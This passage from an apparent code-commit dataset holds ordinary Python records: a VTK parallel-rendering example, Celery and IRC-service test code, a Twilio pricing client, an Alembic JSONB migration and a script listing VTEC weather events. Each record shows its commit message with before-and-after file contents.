#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
<commit_before><commit_msg>Add example of parallel processing using python<commit_after>from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
|
9d105a62b29f0cd170343705bbe20c509d523e46
|
osf_tests/test_handlers.py
|
osf_tests/test_handlers.py
|
import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
Add tests for new get_task_from_queue celery helper
|
Add tests for new get_task_from_queue celery helper
|
Python
|
apache-2.0
|
cslzchen/osf.io,caseyrollins/osf.io,mattclark/osf.io,aaxelb/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,erinspace/osf.io,erinspace/osf.io,sloria/osf.io,pattisdr/osf.io,mfraezz/osf.io,caseyrollins/osf.io,cslzchen/osf.io,mattclark/osf.io,cslzchen/osf.io,felliott/osf.io,felliott/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,mfraezz/osf.io,adlius/osf.io,saradbowman/osf.io,baylee-d/osf.io,cslzchen/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,icereval/osf.io,aaxelb/osf.io,HalcyonChimera/osf.io,baylee-d/osf.io,mattclark/osf.io,CenterForOpenScience/osf.io,sloria/osf.io,CenterForOpenScience/osf.io,erinspace/osf.io,Johnetordoff/osf.io,HalcyonChimera/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,saradbowman/osf.io,pattisdr/osf.io,brianjgeiger/osf.io,adlius/osf.io,Johnetordoff/osf.io,caseyrollins/osf.io,HalcyonChimera/osf.io,aaxelb/osf.io,mfraezz/osf.io,aaxelb/osf.io,felliott/osf.io,icereval/osf.io,felliott/osf.io,sloria/osf.io,HalcyonChimera/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,adlius/osf.io,brianjgeiger/osf.io,icereval/osf.io
|
Add tests for new get_task_from_queue celery helper
|
import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
<commit_before><commit_msg>Add tests for new get_task_from_queue celery helper<commit_after>
|
import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
Add tests for new get_task_from_queue celery helperimport pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
<commit_before><commit_msg>Add tests for new get_task_from_queue celery helper<commit_after>import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
|
8d08a7caeb4da705b2ab5a6f55528d1beae5bedb
|
menpofit/clm/expert/base.py
|
menpofit/clm/expert/base.py
|
import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
Add dummy wrapper for correlation filters
|
Add dummy wrapper for correlation filters
|
Python
|
bsd-3-clause
|
yuxiang-zhou/menpofit,yuxiang-zhou/menpofit,grigorisg9gr/menpofit,grigorisg9gr/menpofit
|
Add dummy wrapper for correlation filters
|
import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
<commit_before><commit_msg>Add dummy wrapper for correlation filters<commit_after>
|
import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
Add dummy wrapper for correlation filtersimport numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
<commit_before><commit_msg>Add dummy wrapper for correlation filters<commit_after>import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
|
f41e79f52a136eb9685a028e31628766015834b0
|
twilio/rest/pricing/__init__.py
|
twilio/rest/pricing/__init__.py
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
Move pricing client into pricing init
|
Move pricing client into pricing init
|
Python
|
mit
|
tysonholub/twilio-python,twilio/twilio-python
|
Move pricing client into pricing init
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
<commit_before><commit_msg>Move pricing client into pricing init<commit_after>
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
Move pricing client into pricing initfrom twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
<commit_before><commit_msg>Move pricing client into pricing init<commit_after>from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
|
48ba0b266d7c87473e2813d56cdc2fd33e8e85df
|
txircd/modules/test/testserv.py
|
txircd/modules/test/testserv.py
|
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
Create a test service testing basic service functionality
|
Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.
|
Python
|
bsd-3-clause
|
ElementalAlchemist/txircd,Heufneutje/txircd
|
Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.
|
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
<commit_before><commit_msg>Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.<commit_after>
|
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
<commit_before><commit_msg>Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.<commit_after>from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
|
fdec47174afa276d3d173567bef62eb9b31cd5d0
|
alembic/versions/4e1d46e710a2_use_jsonb_for_strokes.py
|
alembic/versions/4e1d46e710a2_use_jsonb_for_strokes.py
|
"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
Use JSONB for storing strokes
|
Use JSONB for storing strokes
|
Python
|
agpl-3.0
|
favien/favien,favien/favien,favien/favien
|
Use JSONB for storing strokes
|
"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
<commit_before><commit_msg>Use JSONB for storing strokes<commit_after>
|
"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
Use JSONB for storing strokes"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
<commit_before><commit_msg>Use JSONB for storing strokes<commit_after>"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
|
5ce0e1a3320ac994737436803b8bd0923142e0af
|
htdocs/json/vtec_events.py
|
htdocs/json/vtec_events.py
|
#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
Add quick hack of a VTEC listing, will make JSON when time permits
|
Add quick hack of a VTEC listing, will make JSON when time permits
|
Python
|
mit
|
akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem
|
Add quick hack of a VTEC listing, will make JSON when time permits
|
#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add quick hack of a VTEC listing, will make JSON when time permits<commit_after>
|
#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
Add quick hack of a VTEC listing, will make JSON when time permits#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add quick hack of a VTEC listing, will make JSON when time permits<commit_after>#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
